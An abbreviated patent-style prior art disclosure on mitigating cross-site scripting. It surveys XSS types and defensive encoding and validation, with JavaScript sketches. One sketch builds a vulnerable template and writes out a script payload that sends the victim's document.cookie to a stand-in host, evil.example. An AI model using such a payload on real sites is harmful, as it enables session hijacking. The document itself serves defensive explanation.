Cross-site Script Validation with Certification
Disclosure Number: IPCOM000250550D
Publication Date: 2017-Aug-02
Document File: 4 page(s) / 94K

Publishing Venue

The Prior Art Database

This text was extracted from a PDF file.
This is the abbreviated version, containing approximately 27% of the total text.

Cross-site Script Validation with Certification

This disclosure addresses the cross-site scripting (XSS) threat in the web application security domain, in which web browsers or other user agents render HTML pages with scripting for users. JavaScript is the main target of this disclosure because it is the most commonly used language on the client side. Other scripting languages can be addressed in a similar way if they are embedded via tags.

Cross-site scripting (XSS) happens when a browser executes attacker-supplied JavaScript. If the browser executes JavaScript containing malicious code from an attacker, data and systems can be compromised, for example through theft of the user's session cookie or illegal data access. There are three kinds of XSS: persistent XSS, reflected XSS, and DOM-based XSS. They differ in where the malicious content comes from and how it is inserted as seemingly legitimate script code. However, they share a common root cause: the inability to identify malicious code on both the server and client side.
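To make the reflected case concrete, the following is a minimal sketch (not from the disclosure; the function name, URL, and payload are illustrative) of how a page template that naively concatenates a request parameter turns attacker input into executable script:

```javascript
// Hypothetical sketch of a reflected-XSS vector: a server-side (or
// client-side) template that concatenates a URL parameter into HTML.
function renderSearchPage(query) {
  // Vulnerable: query is inserted as markup, not as text.
  return "<p>Results for " + query + "</p>";
}

// A benign request renders as expected...
renderSearchPage("cats");

// ...but an attacker-crafted URL parameter becomes a live <script>
// element once the browser parses the page, running in the victim's
// session and able to read document.cookie.
const payload =
  '<script>document.location="https://evil.example/?c=" + document.cookie</script>';
const html = renderSearchPage(payload);
```

The same concatenation is harmless for ordinary input, which is exactly why such bugs survive testing: the malicious behavior appears only when the input itself carries markup.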

As discussed below, although we are not so ambitious as to solve the web's No. 1 XSS threat completely, our disclosure aims to maintain, or even improve, the security level with less effort from the typical developer.

Known solutions and their drawbacks

The easiest way to handle XSS threats is to forbid the browser from executing any JavaScript. However, this also removes all the benefits of AJAX and causes problems ranging from performance to user experience.

There have been large efforts to mitigate XSS risks. In order to allow JavaScript to execute on the client side, Web UI and application developers have to devote a large amount of effort to implementing encoding algorithms, validation algorithms, or both, to handle suspected content case by case. Even so, human mistakes and new versions of markup languages can cause security loopholes.

The common solutions involve both server-side and client-side efforts. The client side only does basic encoding (escaping special characters) or validation (filtering out suspected strings). To some extent, this can reduce the risk of an attacker injecting malicious strings, but it mainly addresses persistent XSS attacks. Even so, UI developers may not know what kinds of input an attacker will use, which leaves a big risk.
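The client-side encoding mentioned above can be sketched as a small function that escapes the characters significant in HTML, so attacker input renders as inert text. This is a minimal illustration, not the disclosure's implementation; the function name is ours:

```javascript
// Minimal client-side output encoding: escape the five characters
// that are significant in an HTML text or attribute context.
function escapeHtml(input) {
  return String(input)
    .replace(/&/g, "&amp;")  // must run first, or later escapes get re-escaped
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

escapeHtml("<script>alert(1)</script>");
// → "&lt;script&gt;alert(1)&lt;/script&gt;"
```

Note that this covers only the HTML text/attribute context; input inserted into a URL, CSS, or inline-script context needs different encoding rules, which is part of the case-by-case burden the disclosure describes.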

The server side is better positioned to handle malicious input, since it knows more about the context into which the input is inserted. To some extent, this can reduce the risk of reflected XSS, in which the input comes from the request URL. However, sometimes the client does not send the input strings to the server at all, and the server can do nothing to prevent the client from inserting malicious input into the DOM tree generated from the server's HTML.
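Because the server knows the expected context, it can apply strict whitelist validation instead of trying to enumerate malicious patterns. A minimal sketch, assuming a field that the server knows must be a numeric account id (the function name and format are illustrative):

```javascript
// Server-side whitelist validation: accept only what the context
// allows (here, 1-12 digits) and reject everything else outright.
function validateAccountId(raw) {
  if (!/^[0-9]{1,12}$/.test(raw)) {
    throw new Error("invalid account id");
  }
  return raw;
}

validateAccountId("123456");         // passes through unchanged
// validateAccountId("1<script>");   // would throw before reaching any page
```

This works only because the server knows the context; as the paragraph above notes, input that never reaches the server (as in DOM-based XSS) escapes this check entirely.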

So even when the application is carefully implemented on both server and client, case by case, there are still many loopholes in such a complicated solution....